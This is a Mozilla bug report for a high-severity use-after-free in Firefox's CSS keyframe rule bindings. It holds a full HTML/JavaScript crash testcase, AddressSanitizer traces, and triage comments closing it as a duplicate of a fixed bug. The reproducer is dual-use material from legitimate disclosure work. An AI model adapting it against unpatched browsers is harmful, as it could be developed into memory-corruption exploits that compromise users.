Closed
Bug 1411936
Opened 8 years ago
Closed 8 years ago
heap-use-after-free in mozilla::dom::CSSKeyframeRuleBinding::_objectMoved
Categories
(Core :: DOM: CSS Object Model, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 1410808
People
(Reporter: nils, Unassigned)
Details
(Keywords: csectype-uaf, sec-high)
Attachments
(2 files)
The following testcase crashes the latest ASAN build of Firefox (BuildID=20171025222259). The testcase was a bit tricky to minimise, and while some parts of it don't seem necessary they are required for somewhat reliable reproduction of the crash. The testcase is still a little unreliable and might take a few seconds to trigger. Loading the testcase in multiple tabs helps.
crash.html:
<html>
<head>
<script>
function start() {
o11=new AudioContext('balanced');
new AbortController();
o27=o11.resume();
o27.then(function() {return false},fun0);
try{new DOMParser().parseFromString("<style> </style>",'text/html').getElementsByTagName('style')[0].sheet.rules[0];}catch(e){}
try{new DOMParser().parseFromString('<style>.class1','text/html').getElementsByTagName('style')[0].sheet.rules[0];}catch(e){}
window.top.document.documentElement.style.zoom='1';
try{new DOMParser().parseFromString('<style>isindex','text/html').getElementsByTagName('style')[0].sheet.rules[0];}catch(e){}
o248=document.documentElement.ownerDocument;
o248.head;
o248.write('<html><body><div></div><div></div></body></html>');
document.createRange();
o271=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o271);
document.createRange();
o274=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o274);
o275=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o275);
o276=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o276);
o278=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o278);
document.createRange();
o283=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o283);
o284=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o284);
o285=o248.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o285);
o287=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o287);
o289=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o289);
o290=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o290);
document.documentElement.style.animationDuration='0.05s';
o291=document.createElementNS('http://www.w3.org/1999/xhtml','style');
document.documentElement.appendChild(o291);
document.createRange();
o293=document.createElementNS('http://www.w3.org/1999/xhtml','style');
o293.textContent='@keyframes key8{ from{}';
document.documentElement.appendChild(o293);
document.documentElement.classList.toggle('class2');
document.documentElement.appendChild(document.createTextNode("x"));
o327=o293.sheet;
o328=o327.cssRules;
document.createRange();
try{new DOMParser().parseFromString('<style tab-size=1>','text/html').getElementsByTagName('style')[0].sheet.rules[0];}catch(e){}
new BroadcastChannel('channel');
document.createElementNS('http://www.w3.org/1999/xhtml','style');
}
function fun0() {
o432=o328[0];
o460=o432.cssRules;
o515=o460[0];
o777=o515.style;
o777.parentRule;
o777.parentRule;
}
</script>
</head>
<body onload="start()"></body>
</html>
ASAN output:
=================================================================
==28260==ERROR: AddressSanitizer: heap-use-after-free on address 0x60800009e730 at pc 0x7fcc0bdee426 bp 0x7fffefb277a0 sp 0x7fffefb27798
READ of size 8 at 0x60800009e730 thread T0 (file:// Content)
#0 0x7fcc0bdee425 in UpdateWrapper /builds/worker/workspace/build/src/obj-firefox/dist/include/nsWrapperCache.h:189:9
#1 0x7fcc0bdee425 in UpdateWrapper<mozilla::dom::CSSKeyframeRule> /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/BindingUtils.h:1527
#2 0x7fcc0bdee425 in mozilla::dom::CSSKeyframeRuleBinding::_objectMoved(JSObject*, JSObject*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CSSKeyframeRuleBinding.cpp:139
#3 0x7fcc144abdbf in RelocateCell /builds/worker/workspace/build/src/js/src/jsgc.cpp:2143:13
#4 0x7fcc144abdbf in RelocateArena /builds/worker/workspace/build/src/js/src/jsgc.cpp:2173
#5 0x7fcc144abdbf in js::gc::ArenaList::relocateArenas(js::gc::Arena*, js::gc::Arena*, js::SliceBudget&, js::gcstats::Statistics&) /builds/worker/workspace/build/src/js/src/jsgc.cpp:2213
#6 0x7fcc144acd42 in js::gc::ArenaLists::relocateArenas(JS::Zone*, js::gc::Arena*&, JS::gcreason::Reason, js::SliceBudget&, js::gcstats::Statistics&) /builds/worker/workspace/build/src/js/src/jsgc.cpp:2278:39
#7 0x7fcc144ad050 in js::gc::GCRuntime::relocateArenas(JS::Zone*, JS::gcreason::Reason, js::gc::Arena*&, js::SliceBudget&) /builds/worker/workspace/build/src/js/src/jsgc.cpp:2297:23
#8 0x7fcc144e8949 in js::gc::GCRuntime::compactPhase(JS::gcreason::Reason, js::SliceBudget&, js::AutoLockForExclusiveAccess&) /builds/worker/workspace/build/src/js/src/jsgc.cpp:6528:13
#9 0x7fcc144ece75 in js::gc::GCRuntime::incrementalCollectSlice(js::SliceBudget&, JS::gcreason::Reason, js::AutoLockForExclusiveAccess&) /builds/worker/workspace/build/src/js/src/jsgc.cpp:7006:17
#10 0x7fcc144efb4b in js::gc::GCRuntime::gcCycle(bool, js::SliceBudget&, JS::gcreason::Reason) /builds/worker/workspace/build/src/js/src/jsgc.cpp:7307:5
#11 0x7fcc144f3282 in js::gc::GCRuntime::collect(bool, js::SliceBudget, JS::gcreason::Reason) /builds/worker/workspace/build/src/js/src/jsgc.cpp:7450:25
#12 0x7fcc144fae87 in gcSlice /builds/worker/workspace/build/src/js/src/jsgc.cpp:7536:5
#13 0x7fcc144fae87 in JS::IncrementalGCSlice(JSContext*, JS::gcreason::Reason, long) /builds/worker/workspace/build/src/js/src/jsgc.cpp:8448
#14 0x7fcc0b9338ba in nsJSContext::GarbageCollectNow(JS::gcreason::Reason, nsJSContext::IsIncremental, nsJSContext::IsShrinking, long) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1199:5
#15 0x7fcc0b93dd7b in InterSliceGCRunnerFired(mozilla::TimeStamp, void*) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1804:3
#16 0x7fcc0b95cec0 in operator() /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:2361:20
#17 0x7fcc0b95cec0 in std::_Function_handler<bool (mozilla::TimeStamp), DOMGCSliceCallback(JSContext*, JS::GCProgress, JS::GCDescription const&)::$_6>::_M_invoke(std::_Any_data const&, mozilla::TimeStamp) /builds/worker/workspace/build/src/clang/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.9.4/../../../../include/c++/4.9.4/functional:2024
#18 0x7fcc08a3499d in operator() /builds/worker/workspace/build/src/clang/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.9.4/../../../../include/c++/4.9.4/functional:2440:14
#19 0x7fcc08a3499d in mozilla::IdleTaskRunner::Run() /builds/worker/workspace/build/src/xpcom/threads/IdleTaskRunner.cpp:62
#20 0x7fcc08a73d86 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
#21 0x7fcc08a8e248 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
#22 0x7fcc0985efb1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
#23 0x7fcc097bf4eb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#24 0x7fcc097bf4eb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#25 0x7fcc097bf4eb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#26 0x7fcc0f1c9adf in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
#27 0x7fcc136f9cc7 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
#28 0x7fcc097bf4eb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#29 0x7fcc097bf4eb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#30 0x7fcc097bf4eb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#31 0x7fcc136f967a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
#32 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
#33 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
#34 0x7fcc2637682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#35 0x41dbc8 in _start (/fuzzer3/firefox/firefox+0x41dbc8)
0x60800009e730 is located 16 bytes inside of 96-byte region [0x60800009e720,0x60800009e780)
freed by thread T0 (file:// Content) here:
#0 0x4bc0fb in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
#1 0x7fcc0890cc07 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2729:25
#2 0x7fcc089172e4 in FreeSnowWhite /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2917:3
#3 0x7fcc089172e4 in nsCycleCollector_doDeferredDeletion() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4293
#4 0x7fcc0a24ef63 in AsyncFreeSnowWhite::Run() /builds/worker/workspace/build/src/js/xpconnect/src/XPCJSRuntime.cpp:124:34
#5 0x7fcc08a9537f in IdleRunnableWrapper::Run() /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:339:22
#6 0x7fcc08a73d86 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
#7 0x7fcc08a8e248 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
#8 0x7fcc0985efb1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
#9 0x7fcc097bf4eb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#10 0x7fcc097bf4eb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#11 0x7fcc097bf4eb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#12 0x7fcc0f1c9adf in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
#13 0x7fcc136f9cc7 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
#14 0x7fcc097bf4eb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#15 0x7fcc097bf4eb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#16 0x7fcc097bf4eb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#17 0x7fcc136f967a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
#18 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
#19 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
#20 0x7fcc2637682f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
previously allocated by thread T0 (file:// Content) here:
#0 0x4bc44c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
#1 0x4ed85d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
#2 0x7fcc0f5a5632 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
#3 0x7fcc0f5a5632 in mozilla::ServoKeyframeList::GetRule(unsigned int) /builds/worker/workspace/build/src/layout/style/ServoKeyframesRule.cpp:61
#4 0x7fcc0c646f8b in mozilla::dom::CSSRuleListBinding::DOMProxyHandler::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) const /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CSSRuleListBinding.cpp:392:58
#5 0x7fcc146712e0 in getInternal /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:353:21
#6 0x7fcc146712e0 in js::Proxy::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:363
#7 0x7fcc146958fb in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1600:16
#8 0x7fcc146958fb in js::ForwardingProxyHandler::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) const /builds/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:153
#9 0x7fcc14648db8 in js::CrossCompartmentWrapper::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) const /builds/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:226:23
#10 0x7fcc146712e0 in getInternal /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:353:21
#11 0x7fcc146712e0 in js::Proxy::get(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:363
#12 0x7fcc13994ba0 in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1600:16
#13 0x7fcc13994ba0 in GetElement /builds/worker/workspace/build/src/js/src/jsobjinlines.h:230
#14 0x7fcc13994ba0 in GetObjectElementOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter-inl.h:499
#15 0x7fcc13994ba0 in GetElementOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter-inl.h:627
#16 0x7fcc13994ba0 in Interpret(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2905
#17 0x7fcc1397af9a in js::RunScript(JSContext*, js::RunState&) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
#18 0x7fcc139a873f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
#19 0x7fcc139a9632 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
#20 0x7fcc13b6c0db in PromiseReactionJob(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/src/builtin/Promise.cpp:1238:14
#21 0x7fcc139a8640 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
#22 0x7fcc139a8640 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
#23 0x7fcc139a9632 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
#24 0x7fcc143ee15b in JS::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3020:12
#25 0x7fcc0c16888a in mozilla::dom::PromiseJobCallback::Call(JSContext*, JS::Handle<JS::Value>, mozilla::ErrorResult&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/PromiseBinding.cpp:21:8
#26 0x7fcc088f9818 in Call /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/PromiseBinding.h:89:12
#27 0x7fcc088f9818 in Call /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/PromiseBinding.h:104
#28 0x7fcc088f9818 in mozilla::PromiseJobRunnable::Run() /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSContext.cpp:212
#29 0x7fcc0ec306ff in mozilla::dom::Promise::PerformMicroTaskCheckpoint() /builds/worker/workspace/build/src/dom/promise/Promise.cpp:531:29
#30 0x7fcc088e1200 in mozilla::CycleCollectedJSContext::AfterProcessTask(unsigned int) /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSContext.cpp:365:7
#31 0x7fcc0a20345d in XPCJSContext::AfterProcessTask(unsigned int) /builds/worker/workspace/build/src/js/xpconnect/src/XPCJSContext.cpp:1207:30
#32 0x7fcc08a743cf in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1053:24
#33 0x7fcc08a8e248 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
#34 0x7fcc0985efb1 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
#35 0x7fcc097bf4eb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#36 0x7fcc097bf4eb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#37 0x7fcc097bf4eb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#38 0x7fcc0f1c9adf in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
#39 0x7fcc136f9cc7 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
#40 0x7fcc097bf4eb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
#41 0x7fcc097bf4eb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
#42 0x7fcc097bf4eb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
#43 0x7fcc136f967a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
#44 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
#45 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/nsWrapperCache.h:189:9 in UpdateWrapper
Shadow bytes around the buggy address:
0x0c108000bc90: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c108000bca0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c108000bcb0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c108000bcc0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c108000bcd0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c108000bce0: fa fa fa fa fd fd[fd]fd fd fd fd fd fd fd fd fd
0x0c108000bcf0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x0c108000bd00: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x0c108000bd10: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x0c108000bd20: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
0x0c108000bd30: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==28260==ABORTING
|
||
Updated•8 years ago
|
Group: core-security → layout-core-security
Summary: heap-use-after-free in mozilla::dom::CSSKeyframeRuleBinding::_objectMoved → heap-use-after-free in mozilla::dom::CSSKeyframeRuleBinding::_objectMoved
|
|
||
Updated•8 years ago
|
Keywords: csectype-uaf,
sec-high
|
||
Comment 2•8 years ago
|
||
Smells a lot like bug 1410808, for the parentRule calls.
|
|
||
Comment 3•8 years ago
|
||
And doesn't crash on nightly, so I think it's indeed the same bug.
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
|
|
||
Comment 4•8 years ago
|
||
Well, I didn't read that it was hard to repro, let me try a bit more before duping it...
Status: RESOLVED → REOPENED
Resolution: DUPLICATE → ---
|
||
Comment 5•8 years ago
|
||
I can reproduce the crash in rev 4d5c0c5017c7, but not in rev d44c182148c2,
using a local ASAN Opt build on Linux.
So it appears this was indeed fixed by bug 1410808.
Status: REOPENED → RESOLVED
Closed: 8 years ago → 8 years ago
Resolution: --- → DUPLICATE
|
||
Updated•5 years ago
|
Group: layout-core-security
You need to log in
before you can comment on or make changes to this bug.
Description
•